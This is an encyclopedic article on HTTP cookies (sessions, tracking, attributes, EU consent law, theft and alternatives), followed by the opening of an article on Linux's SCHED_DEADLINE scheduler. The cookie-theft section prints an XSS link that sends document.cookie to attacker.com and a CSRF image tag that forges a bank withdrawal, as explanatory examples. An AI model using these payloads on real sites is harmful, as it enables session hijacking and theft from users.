Because session cookies only contain a unique session identifier, this makes the amount of personal information that a website can save about each user virtually limitless—the website is not limited to restrictions concerning how large a cookie can be. Session cookies also help to improve page load times, since the amount of information in a session cookie is small and requires little bandwidth.
Personalization
Cookies can be used to remember information about the user in order to show relevant content to that user over time. For example, a web server might send a cookie containing the username that was last used to log into a website, so that it may be filled in automatically the next time the user logs in.
Many websites use cookies for personalization based on the user's preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page on the website, the server can personalize the page according to the user's preferences. For example, the Google search engine once used cookies to allow users (even non-registered ones) to decide how many search results per page they wanted to see.
Also, DuckDuckGo uses cookies to allow users to set the viewing preferences like colors of the web page.
Tracking
Tracking cookies are used to track users' web browsing habits. This can also be done to some extent by using the IP address of the computer requesting the page or the referer field of the HTTP request header, but cookies allow for greater precision. This can be demonstrated as follows:
If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user. So the server creates a unique identifier (typically a string of random letters and numbers) and sends it as a cookie back to the browser together with the requested page.
From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested. The server not only sends the page as usual but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.
By analyzing this log file, it is then possible to find out which pages the user has visited, in what sequence, and for how long.
Corporations exploit users' web habits by tracking cookies to collect information about buying habits. The Wall Street Journal found that America's top fifty websites installed an average of sixty-four pieces of tracking technology onto computers, resulting in a total of 3,180 tracking files. The data can then be collected and sold to bidding corporations.
Implementation
Cookies are arbitrary pieces of data, usually chosen and first sent by the web server, and stored on the client computer by the web browser. The browser then sends them back to the server with every request, introducing states (memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a web page or component of a web page would be an isolated event, largely unrelated to all other page views made by the user on the website. Although cookies are usually set by the web server, they can also be set by the client using a scripting language such as JavaScript (unless the cookie's HttpOnly flag is set, in which case the cookie cannot be modified by scripting languages).
The cookie specifications require that browsers meet the following requirements in order to support cookies:
Can support cookies as large as 4,096 bytes in size.
Can support at least 50 cookies per domain (i.e. per website).
Can support at least 3,000 cookies in total.
Setting a cookie
Cookies are set using the Set-Cookie header field, sent in an HTTP response from the web server. This header field instructs the web browser to store the cookie and send it back in future requests to the server (the browser will ignore this header field if it does not support cookies or has disabled cookies).
As an example, the browser sends its first HTTP request for the homepage of the www.example.org website:
GET /index.html HTTP/1.1
Host: www.example.org
...
The server responds with two Set-Cookie header fields:
HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: theme=light
Set-Cookie: sessionToken=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT
...
The server's HTTP response contains the contents of the website's homepage. But it also instructs the browser to set two cookies. The first, "theme", is considered to be a session cookie since it does not have an Expires or Max-Age attribute. Session cookies are intended to be deleted by the browser when the browser closes. The second, "sessionToken", is considered to be a persistent cookie since it contains an Expires attribute, which instructs the browser to delete the cookie at a specific date and time.
Next, the browser sends another request to visit the spec.html page on the website. This request contains a Cookie header field, which contains the two cookies that the server instructed the browser to set:
GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: theme=light; sessionToken=abc123
…
This way, the server knows that this HTTP request is related to the previous one. The server would answer by sending the requested page, possibly including more Set-Cookie header fields in the HTTP response in order to instruct the browser to add new cookies, modify existing cookies, or remove existing cookies. To remove a cookie, the server must include a Set-Cookie header field with an expiration date in the past.
The value of a cookie may consist of any printable ASCII character (! through ~, Unicode \u0021 through \u007E) excluding and whitespace characters. The name of a cookie excludes the same characters, as well as =, since that is the delimiter between the name and value. The cookie standard RFC 2965 is more restrictive but not implemented by browsers.
The term "cookie crumb" is sometimes used to refer to a cookie's name–value pair.
Cookies can also be set by scripting languages such as JavaScript that run within the browser. In JavaScript, the object document.cookie is used for this purpose. For example, the instruction document.cookie = "temperature=20" creates a cookie of name "temperature" and value "20".
Cookie attributes
In addition to a name and value, cookies can also have one or more attributes. Browsers do not include cookie attributes in requests to the server—they only send the cookie's name and value. Cookie attributes are used by browsers to determine when to delete a cookie, block a cookie or whether to send a cookie to the server.
Domain and Path
The Domain and Path attributes define the scope of the cookie. They essentially tell the browser what website the cookie belongs to. For security reasons, cookies can only be set on the current resource's top domain and its subdomains, and not for another domain and its subdomains. For example, the website example.org cannot set a cookie that has a domain of foo.com because this would allow the website example.org to control the cookies of the domain foo.com.
If a cookie's Domain and Path attributes are not specified by the server, they default to the domain and path of the resource that was requested. However, in most browsers there is a difference between a cookie set from foo.com without a domain, and a cookie set with the foo.com domain. In the former case, the cookie will only be sent for requests to foo.com, also known as a host-only cookie. In the latter case, all subdomains are also included (for example, docs.foo.com). A notable exception to this general rule is Edge prior to Windows 10 RS3 and Internet Explorer prior to IE 11 and Windows 10 RS4 (April 2018), which always sends cookies to subdomains regardless of whether the cookie was set with or without a domain.
Below is an example of some Set-Cookie header fields in the HTTP response of a website after a user logged in. The HTTP request was sent to a webpage within the docs.foo.com subdomain:
HTTP/1.0 200 OK
Set-Cookie: LSID=DQAAAK…Eaem_vYg; Path=/accounts; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn…DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P…GTEq; Domain=foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
…
The first cookie, LSID, has no Domain attribute, and has a Path attribute set to /accounts. This tells the browser to use the cookie only when requesting pages contained in docs.foo.com/accounts (the domain is derived from the request domain). The other two cookies, HSID and SSID, would be used when the browser requests any subdomain in .foo.com on any path (for example www.foo.com/bar). The prepending dot is optional in recent standards, but can be added for compatibility with RFC 2109 based implementations.
Expires and Max-Age
The Expires attribute defines a specific date and time for when the browser should delete the cookie. The date and time are specified in the form Wdy, DD Mon YYYY HH:MM:SS GMT, or in the form Wdy, DD Mon YY HH:MM:SS GMT for values of YY where YY is greater than or equal to 0 and less than or equal to 69.
Alternatively, the Max-Age attribute can be used to set the cookie's expiration as an interval of seconds in the future, relative to the time the browser received the cookie. Below is an example of three Set-Cookie header fields that were received from a website after a user logged in:
HTTP/1.0 200 OK
Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Jan 2013 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly
Set-Cookie: made_write_conn=1295214458; Path=/; Domain=.example.com
Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.example.com; HttpOnly
The first cookie, lu, is set to expire sometime on 15 January 2013. It will be used by the client browser until that time. The second cookie, made_write_conn, does not have an expiration date, making it a session cookie. It will be deleted after the user closes their browser. The third cookie, reg_fb_gate, has its value changed to "deleted", with an expiration time in the past. The browser will delete this cookie right away because its expiration time is in the past. Note that cookie will only be deleted if the domain and path attributes in the Set-Cookie field match the values used when the cookie was created.
Internet Explorer did not support Max-Age.
Secure and HttpOnly
The Secure and HttpOnly attributes do not have associated values. Rather, the presence of just their attribute names indicates that their behaviors should be enabled.
The Secure attribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only via secure/encrypted connections. However, if a web server sets a cookie with a secure attribute from a non-secure connection, the cookie can still be intercepted when it is sent to the user by man-in-the-middle attacks. Therefore, for maximum security, cookies with the Secure attribute should only be set over a secure connection.
The HttpOnly attribute directs browsers not to expose cookies through channels other than HTTP (and HTTPS) requests. This means that the cookie cannot be accessed via client-side scripting languages (notably JavaScript), and therefore cannot be stolen easily via cross-site scripting (a pervasive attack technique).
Browser settings
Most modern browsers support cookies and allow the user to disable them. The following are common options:
To enable or disable cookies completely, so that they are always accepted or always blocked.
To view and selectively delete cookies using a cookie manager.
To fully wipe all private data, including cookies.
Add-on tools for managing cookie permissions also exist.
Privacy and third-party cookies
Cookies have some important implications for the privacy and anonymity of web users. While cookies are sent only to the server setting them or a server in the same Internet domain, a web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called third-party cookies. The older standards for cookies, RFC 2109 and RFC 2965, specify that browsers should protect user privacy and not allow sharing of cookies between servers by default. However, the newer standard, RFC 6265, explicitly allows user agents to implement whichever third-party cookie policy they wish. Most browsers, such as Mozilla Firefox, Internet Explorer, Opera, and Google Chrome, do allow third-party cookies by default, as long as the third-party website has Compact Privacy Policy published. Newer versions of Safari block third-party cookies, and this is planned for Mozilla Firefox as well (initially planned for version 22 but postponed indefinitely).
Advertising companies use third-party cookies to track a user across multiple sites. In particular, an advertising company can track a user across all pages where it has placed advertising images or web bugs. Knowledge of the pages visited by a user allows the advertising company to target advertisements to the user's presumed preferences.
Website operators who do not disclose third-party cookie use to consumers run the risk of harming consumer trust if cookie use is discovered. Having clear disclosure (such as in a privacy policy) tends to eliminate any negative effects of such cookie discovery.
The possibility of building a profile of users is a privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.
The United States government has set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers that had visited its website. When notified it was violating policy, CIA stated that these cookies were not intentionally set and stopped setting them. On December 25, 2005, Brandt discovered that the National Security Agency (NSA) had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the NSA immediately disabled the cookies.
EU cookie directive
In 2002, the European Union launched the Directive on Privacy and Electronic Communications (e-Privacy Directive), a policy requiring end users' consent for the placement of cookies, and similar technologies for storing and accessing information on users' equipment. In particular, Article 5 Paragraph 3 mandates that storing technically unnecessary data on a user's computer can only be done if the user is provided information about how this data is used, and the user is given the possibility of denying this storage operation. The Directive does not require users to authorise or be provided notice of cookie usage that are functionally required for delivering a service they have requested, for example to retain settings, store log-in sessions, or remember what is in a user's shopping basket.
In 2009, the law was amended by Directive 2009/136/EC, which included a change to Article 5, Paragraph 3. Instead of having an option for users to opt out of cookie storage, the revised Directive requires consent to be obtained for cookie storage. The definition of consent is cross-referenced to the definition in European data protection law, firstly the Data Protection Directive 1995 and subsequently the General Data Protection Regulation (GDPR). As the definition of consent was strengthened in the text of the GDPR, this had the effect of increasing the quality of consent required by those storing and accessing information such as cookies on users devices. In a case decided under the Data Protection Directive however, the Court of Justice of the European Union later confirmed however that the previous law implied the same strong quality of consent as the current instrument. In addition to the requirement of consent which stems from storing or accessing information on a user's terminal device, the information in many cookies will be considered personal data under the GDPR alone, and will require a legal basis to process. This has been the case since the 1995 Data Protection Directive, which used an identical definition of personal data, although the GDPR in interpretative Recital 30 clarifies that cookie identifiers are included. While not all data processing under the GDPR requires consent, the characteristics of behavioural advertising mean that it is difficult or impossible to justify under any other ground.
Consent under the combination of the GDPR and e-Privacy Directive has to meet a number of conditions in relation to cookies. It must be freely given and unambiguous: preticked boxes were banned under both the Data Protection Directive 1995 and the GDPR (Recital 32). The GDPR is specific that consent must be as 'easy to withdraw as to give', meaning that a reject-all button must be as easy to access in terms of clicks and visibility as an 'accept all' button. It must be specific and informed, meaning that consent relates to particular purposes for the use of this data, and all organisations seeking to use this consent must be specifically named. The Court of Justice of the European Union has also ruled that consent must be 'efficient and timely', meaning that it must be gained before cookies are laid and data processing begins instead of afterwards.
The industry's response has been largely negative. Robert Bond of the law firm Speechly Bircham describes the effects as "far-reaching and incredibly onerous" for "all UK companies". Simon Davis of Privacy International argues that proper enforcement would "destroy the entire industry". However, scholars note that the onerous nature of cookie pop-ups stems from an attempt to continue to operate a business model through convoluted requests that may be incompatible with the GDPR.
Academic studies and regulators both describe wide-spread non-compliance with the law. A study scraping 10,000 UK websites found that only 11.8% of sites adhered to minimal legal requirements, with only 33.4% of websites studied providing a mechanism to reject cookies that was as easy to use as accepting them. A study of 17,000 websites found that 84% of sites breached this criterion, finding additionally that many laid third party cookies with no notice at all. The UK regulator, the Information Commissioner's Office, stated in 2019 that the industry's 'Transparency and Consent Framework' from the advertising technology group the Interactive Advertising Bureau was 'insufficient to ensure transparency and fair processing of the personal data in question and therefore also insufficient to provide for free and informed consent, with attendant implications for PECR [e-Privacy] compliance.' Many companies that sell compliance solutions (Consent Management Platforms) permit them to be configured in manifestly illegal ways, which scholars have noted creates questions around the appropriate allocation of liability.
A W3C specification called P3P was proposed for servers to communicate their privacy policy to browsers, allowing automatic, user-configurable handling. However, few websites implement the specification, no major browsers support it, and the W3C has discontinued work on the specification.
Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's web experience on all sites. Some sites operate 'cookie walls', which make access to a site conditional on allowing cookies either technically in a browser, through pressing 'accept', or both. In 2020, the European Data Protection Board, composed of all EU data protection regulators, stated that cookie walls were illegal.In order for consent to be freely given, access to services and functionalities must not be made conditional on the consent of a user to the storing of information, or gaining of access to information already stored, in the terminal equipment of a user (so called cookie walls).Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising. However, this is often ineffective against many forms of tracking, such as first-party tracking that is growing in popularity to avoid the impact of browsers blocking third party cookies. Furthermore, if such a setting is more difficult to place than the acceptance of tracking, it remains in breach of the conditions of the e-Privacy Directive.
Cookie theft and session hijacking
Most websites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a website uses cookies as session identifiers, attackers can impersonate users' requests by stealing a full set of victims' cookies. From the web server's point of view, a request from an attacker then has the same authentication as the victim's requests; thus the request is performed on behalf of the victim's session.
Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) that work with websites relying solely on HTTP cookies for user identification.
Network eavesdropping
Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly over unencrypted open Wi-Fi). This traffic includes cookies sent on ordinary unencrypted HTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations, for the purpose of a man-in-the-middle attack.
An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim's bank account.
This issue can be resolved by securing the communication between the user's computer and the server by employing Transport Layer Security (HTTPS protocol) to encrypt the connection. A server can specify the Secure flag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as a TLS connection.
Publishing false sub-domain: DNS cache poisoning
If an attacker is able to cause a DNS server to cache a fabricated DNS entry (called DNS cache poisoning), then this could allow the attacker to gain access to a user's cookies. For example, an attacker could use DNS cache poisoning to create a fabricated DNS entry of f12345.www.example.com that points to the IP address of the attacker's server. The attacker can then post an image URL from his own server (for example, http://f12345.www.example.com/img_4_cookie.jpg). Victims reading the attacker's message would download this image from f12345.www.example.com. Since f12345.www.example.com is a sub-domain of www.example.com, victims' browsers would submit all example.com-related cookies to the attacker's server.
If an attacker is able to accomplish this, it is usually the fault of the Internet Service Providers for not properly securing their DNS servers. However, the severity of this attack can be lessened if the target website uses secure cookies. In this case, the attacker would have the extra challenge of obtaining the target website's TLS certificate from a certificate authority, since secure cookies can only be transmitted over an encrypted connection. Without a matching TLS certificate, victims' browsers would display a warning message about the attacker's invalid certificate, which would help deter users from visiting the attacker's fraudulent website and sending the attacker their cookies.
Cross-site scripting: cookie theft
Cookies can also be stolen using a technique called cross-site scripting. This occurs when an attacker takes advantage of a website that allows its users to post unfiltered HTML and JavaScript content. By posting malicious HTML and JavaScript code, the attacker can cause the victim's web browser to send the victim's cookies to a website the attacker controls.
As an example, an attacker may post a message on www.example.com with the following link:
<a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>
When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string document.cookie with the list of cookies that are accessible from the current page. As a result, this list of cookies is sent to the attacker.com server. If the attacker's malicious posting is on an HTTPS website https://www.example.com, secure cookies will also be sent to attacker.com in plain text.
It is the responsibility of the website developers to filter out such malicious code.
Such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client-side scripting languages like JavaScript, and therefore, the attacker will not be able to gather these cookies.
Cross-site scripting: proxy request
In older versions of many browsers, there were security holes in the implementation of the XMLHttpRequest API. This API allows pages to specify a proxy server that would get the reply, and this proxy server is not subject to the same-origin policy. For example, a victim is reading an attacker's posting on www.example.com, and the attacker's script is executed in the victim's browser. The script generates a request to www.example.com with the proxy server attacker.com. Since the request is for www.example.com, all example.com cookies will be sent along with the request, but routed through the attacker's proxy server. Hence, the attacker would be able to harvest the victim's cookies.
This attack would not work with secure cookies, since they can only be transmitted over HTTPS connections, and the HTTPS protocol dictates end-to-end encryption (i.e. the information is encrypted on the user's browser and decrypted on the destination server). In this case, the proxy server would only see the raw, encrypted bytes of the HTTP request.
Cross-site request forgery
For example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file), e.g.,
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">
If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.
Cookiejacking
Cookiejacking is an attack against Internet Explorer which allows the attacker to steal session cookies of a user by tricking a user into dragging an object across the screen. Microsoft deemed the flaw low-risk because of "the level of required user interaction", and the necessity of having a user already logged into the website whose cookie is stolen. Despite this, a researcher tried the attack on 150 of their Facebook friends and obtained cookies of 80 of them via social engineering.
Drawbacks of cookies
Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer (REST) software architectural style.
Inaccurate identification
If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence, cookies do not identify a person, but a combination of a user account, a computer, and a web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.
Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.
Inconsistent state on client and server
The use of cookies may generate an inconsistency between the state of the client and the state as stored in the cookie. If the user acquires a cookie and then clicks the "Back" button of the browser, the state on the browser is generally not the same as before that acquisition. As an example, if the shopping cart of an online shop is built using cookies, the content of the cart may not change when the user goes back in the browser's history: if the user presses a button to add an item in the shopping cart and then clicks on the "Back" button, the item remains in the shopping cart. This might not be the intention of the user, who possibly wanted to undo the addition of the item. This can lead to unreliability, confusion, and bugs. Web developers should therefore be aware of this issue and implement measures to handle such situations.
Alternatives to cookies
Some of the operations that can be done using cookies can also be done using other mechanisms.
JSON Web Tokens
A JSON Web Token (JWT) is a self-contained packet of information that can be used to store user identity and authenticity information. This allows them to be used in place of session cookies. Unlike cookies, which are automatically attached to each HTTP request by the browser, JWTs must be explicitly attached to each HTTP request by the web application.
HTTP authentication
The HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.
IP address
Some users may be tracked based on the IP address of the computer requesting the page. The server knows the IP address of the computer running the browser (or the proxy, if any is used) and could theoretically link a user's session to this IP address.
However, IP addresses are generally not a reliable way to track a session or identify a user. Many computers designed to be used by a single user, such as office PCs or home PCs, are behind a network address translator (NAT). This means that several PCs will share a public IP address. Furthermore, some systems, such as Tor, are designed to retain Internet anonymity, rendering tracking by IP address impractical, impossible, or a security risk.
URL (query string)
A more precise technique is based on embedding information into URLs. The query string part of the URL is the part that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.
This method consists of the web server appending query strings containing a unique session identifier to all the links inside of a web page. When the user follows a link, the browser sends the query string to the server, allowing the server to identify the user and maintain state.
These kinds of query strings are very similar to cookies in that both contain arbitrary pieces of information chosen by the server and both are sent back to the server on every request. However, there are some differences. Since a query string is part of a URL, if that URL is later reused, the same attached piece of information will be sent to the server, which could lead to confusion. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well.
Moreover, if the same user accesses the same page multiple times from different sources, there is no guarantee that the same query string will be used each time. For example, if a user visits a page by coming from a page internal to the site the first time, and then visits the same page by coming from an external search engine the second time, the query strings would likely be different. If cookies were used in this situation, the cookies would be the same.
Other drawbacks of query strings are related to security. Storing data that identifies a session in a query string enables session fixation attacks, referer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.
Hidden form fields
Another form of session tracking is to use web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks. In fact, if the form is handled with the HTTP GET method, then this technique is similar to using URL query strings, since the GET method adds the form fields to the URL as a query string. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be sent in the HTTP request body, which is neither part of the URL, nor of a cookie.
This approach presents two advantages from the point of view of the tracker. First, having the tracking information placed in the HTTP request body rather than in the URL means it will not be noticed by the average user. Second, the session information is not copied when the user copies the URL (to bookmark the page or send it via email, for example).
"window.name" DOM property
All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using the DOM property window.name. This data can be used instead of session cookies and is also cross-domain. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables on the client side.
The downside is that every separate window or tab will initially have an empty window.name property when opened. Furthermore, the property can be used for tracking visitors across different websites, making it of concern for Internet privacy.
In some respects, this can be more secure than cookies due to the fact that its contents are not automatically sent to the server on every request like cookies are, so it is not vulnerable to network cookie sniffing attacks. However, if special measures are not taken to protect the data, it is vulnerable to other attacks because the data is available across different websites opened in the same window or tab.
Identifier for advertisers
Apple uses a tracking technique called the "Identifier for Advertisers" (IDFA). This technique assigns a unique identifier to every user who buys an Apple iOS device (such as an iPhone or iPad). This identifier is then used by Apple's advertising network, iAd, to determine the ads that individuals are viewing and responding to.
ETag
Because ETags are cached by the browser, and returned with subsequent requests for the same resource, a tracking server can simply repeat any ETag received from the browser to ensure an assigned ETag persists indefinitely (in a similar way to persistent cookies). Additional caching header fields can also enhance the preservation of ETag data.
ETags can be flushed in some browsers by clearing the browser cache.
Web storage
Some web browsers support persistence mechanisms which allow the page to store the information locally for later use.
The HTML5 standard (which most modern web browsers support to some extent) includes a JavaScript API called Web storage that allows two types of storage: local storage and session storage. Local storage behaves similarly to persistent cookies while session storage behaves similarly to session cookies, except that session storage is tied to an individual tab/window's lifetime (AKA a page session), not to a whole browser session like session cookies.
Internet Explorer supports persistent information in the browser's history, in the browser's favorites, in an XML store ("user data"), or directly within a web page saved to disk.
Some web browser plugins include persistence mechanisms as well. For example, Adobe Flash has Local shared object and Microsoft Silverlight has Isolated storage.
Browser cache
The browser cache can also be used to store information that can be used to track individual users. This technique takes advantage of the fact that the web browser will use resources stored within the cache instead of downloading them from the website when it determines that the cache already has the most up-to-date version of the resource.
For example, a website could serve a JavaScript file with code that sets a unique identifier for the user (for example, var userId = 3243242;). After the user's initial visit, every time the user accesses the page, this file will be loaded from the cache instead of downloaded from the server. Thus, its content will never change.
Browser fingerprint
A browser fingerprint is information collected about a browser's configuration, such as version number, screen resolution, and operating system, for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.
Basic web browser configuration information has long been collected by web analytics services in an effort to accurately measure real human web traffic and discount various forms of click fraud. With the assistance of client-side scripting languages, collection of much more esoteric parameters is possible. Assimilation of such information into a single string constitutes a device fingerprint. In 2010, EFF measured at least 18.1 bits of entropy possible from browser fingerprinting. Canvas fingerprinting, a more recent technique, claims to add another 5.7 bits.
See also
Dynamic HTML
Enterprise JavaBeans
Session (computer science)
Secure cookie
HTTP Strict Transport Security § Privacy issues
References
Sources
Anonymous, 2011. Cookiejacking Attack Steals Website Access Credentials. Informationweek - Online, pp. Informationweek - Online, May 26, 2011.
External links
, the current official specification for HTTP cookies
HTTP cookies, Mozilla Developer Network
Using cookies via ECMAScript, Mozilla Developer Network
Cookies at the Electronic Privacy Information Center (EPIC)
Mozilla Knowledge-Base: Cookies
Cookie Domain, explain in detail how cookie domains are handled in current major browsers
Cookie Stealing - Michael Pound
Check cookies for compliance with EU cookie directive
Computer access control
Cookie
Internet privacy
Web security exploits
Wikipedia articles with ASCII art
Hacking (computer security)
Tracking
|
30419009
|
https://en.wikipedia.org/wiki/SCHED%20DEADLINE
|
SCHED DEADLINE
|
SCHED_DEADLINE is a CPU scheduler available in the Linux kernel since version 3.14, based on the Earliest Deadline First (EDF) and Constant Bandwidth Server (CBS) algorithms, supporting resource reservations: each task scheduled under such policy is associated with a budget Q (aka runtime), and a period P, corresponding to a declaration to the kernel that Q time units are required by that task every P time units, on any processor. This makes SCHED_DEADLINE particularly suitable for real-time applications, like multimedia or industrial control, where P corresponds to the minimum time elapsing between subsequent activations of the task, and Q corresponds to the worst-case execution time needed by each activation of the task.
Background on CPU schedulers in the Linux kernel
The Linux kernel contains different scheduler classes. By default, the kernel uses a scheduler mechanism called the Completely Fair Scheduler (CFS) introduced in the 2.6.23 version of the kernel. Internally, this default scheduler class is also known as SCHED_NORMAL, and the kernel also contains two POSIX-compliant real-time scheduling classes named SCHED_FIFO (realtime first-in-first-out) and SCHED_RR (realtime round-robin) both of which take precedence over the default class. The SCHED_DEADLINE scheduling class was added to the Linux scheduler in version 3.14 of the Linux kernel mainline, released on 30 March 2014,
and takes precedence over all the other scheduling classes.
The default scheduler, CFS, makes a very good job in coping with different use cases. For example, when mixing batch workloads such as long-running code compilations or number crunching, and interactive applications such as desktop applications, multi-media or others, the CFS dynamically de-prioritizes batch tasks in favour of interactive ones. However, when an application needs a predictable and precise schedule, normally it has to recur to one of the other real-time schedulers, SCHED_RR or SCHED_FIFO, which apply fixed-priority to schedule tasks by priorities, and whose tasks are scheduled before any task in the SCHED_NORMAL class.
Operation
When mixing real-time workloads with heterogeneous timing requirements on the same system, a well-known problem of SCHED_RR and SCHED_FIFO is that, as these are based on tasks priorities, higher-priority tasks running for longer than expected may arbitrarily delay lower-priority tasks in an uncontrolled way.
With SCHED_DEADLINE, instead, tasks declare independently their timing requirements, in terms of a per-task runtime needed every per-task period (and due within a per-task deadline since each period start), and the kernel accepts them in the scheduler after a schedulability test. Now, if a task tries to run for longer than its assigned budget, the kernel will suspend that task and defer its execution to its next activation period. This non-work conserving property of the scheduler allows it to provide temporal isolation among the tasks. This results in the important property that, on single-processor systems, or on partitioned multi-processor systems (where tasks are partitioned among available CPUs, so each task is pinned down on a specific CPU and cannot migrate), all accepted SCHED_DEADLINE tasks are guaranteed to be scheduled for an overall time equal to their budget in every time window as long as their period, unless the task itself blocks and doesn't need to run. Also, a peculiar property of the CBS algorithm is that it guarantees temporal isolation also in presence of tasks blocking and resuming execution: this is done by resetting a task scheduling deadline to a whole period apart, whenever a task wakes up too late. In the general case of tasks free to migrate on a multi-processor, as SCHED_DEADLINE implements global EDF, the general tardiness bound for global EDF applies, as explained in.
In order to better understand how the scheduler works, consider a set of SCHED_DEADLINE tasks with potentially different periods, having the deadline equal to the period. For each task, in addition to the configured runtime and (relative) period, the kernel keeps track of a current runtime and a current (absolute) deadline. Tasks are scheduled on CPUs based on their current deadlines, using global EDF. When a task scheduling policy is initially set to SCHED_DEADLINE, the current deadline is initialized to the current time plus the configured period, and the current budget is set equal to the configured budget. Each time a task is scheduled to run on any CPU, the kernel lets it run for at most the available current budget, and whenever the task is descheduled its current budget is decreased by the amount of time it has been run. Once the current budget goes to zero, the task is suspended (throttled) till the next activation period, when the current budget is refilled again to the configured value, and the deadline is moved forward by a value equal to the task period.
This is not sufficient to guarantee temporal isolation. A task suspending itself shortly after its activation, and then waking up close to its current deadline or even beyond, would wake up with nearly the whole of its configured budget, with a current deadline that is very close to expire, or even in the past. In such condition, that task would be scheduled before any other one, and on a single-processor system it would be able to delay execution of any other deadline task for as long as its budget. In order to avoid this problem, SCHED_DEADLINE adopts the wake-up scheduling rule defined in the CBS algorithm. When a task wakes up, if a relatively small time has elapsed since the task blocked, then the previous current deadline and budget are kept unchanged for the task. However, if an excessive amount of time has elapsed, then the kernel resets the current deadline to the current time plus the reservation period, and the current budget to the allocated reservation budget. For a longer explanation with examples, see.
On a multi-processor or multi-core system, SCHED_DEADLINE implements global EDF, so tasks are able to migrate across available CPUs. In such a case, the configured budget is the total cumulative amount of time the task is allowed to run on any CPU during each period. However, the scheduler also respects tasks' affinity masks, so one can easily create partitioned scheduling scenarios, partitioning tasks in groups where each group is restricted to a specific CPU, or clustered scheduling scenarios, obtained by also partitioning CPUs and each tasks partition is pinned down to a specific CPUs partition.
For technical details about SCHED_DEADLINE, refer to the documentation available within the kernel source tree.
For further details on the CBS and how it enables temporal isolation, refer to the original CBS paper, or the section about the CBS in this article appeared on lwn.net.
History
The initial idea of a Linux scheduling class based on the Earliest Deadline First (EDF) algorithm was born in the small context of the Real-Time Systems (ReTiS) Lab of Scuola Superiore Sant'Anna and its Spin-Off company Evidence Srl. Then, Evidence Srl leveraged the funding of the ACTORS project, supported by the European Commission through the FP7 framework programme, for financing and promoting the development of the first versions of the patch.
The original version has been developed by Dario Faggioli (contract by Evidence Srl for the development of the first three versions) and Juri Lelli (since the fourth version) with sporadic help from Michael Trimarchi and Fabio Checconi. Johan Eker has been in charge of coordination within ACTORS and supporting from Ericsson. Juri Lelli, Luca Abeni and Claudio Scordino have collaborated to the development of the reclaiming (i.e. GRUB) and frequency-scaling (i.e. GRUB-PA) features.
The patch has been periodically released to the kernel community through the Linux kernel mailing list (LKML). Each release aligned the code to the latest version of the kernel and took into account comments received at the previous submission.
As the popularity of the scheduler increased, a higher number of kernel developers started providing their feedback and their contribution.
The project was originally called SCHED_EDF and presented to the Linux kernel community in 2009. With this name was also presented to the Real-Time Linux Workshop after a few weeks. The name has been then changed to SCHED_DEADLINE after the request of the Linux kernel community.
In the course of the years, the following versions have been released:
The first version of the scheduler was submitted on September 22, 2009, with the name of SCHED_EDF.
The first version of the scheduler after the name changed to SCHED_DEADLINE was submitted to LKML on October 16, 2009.
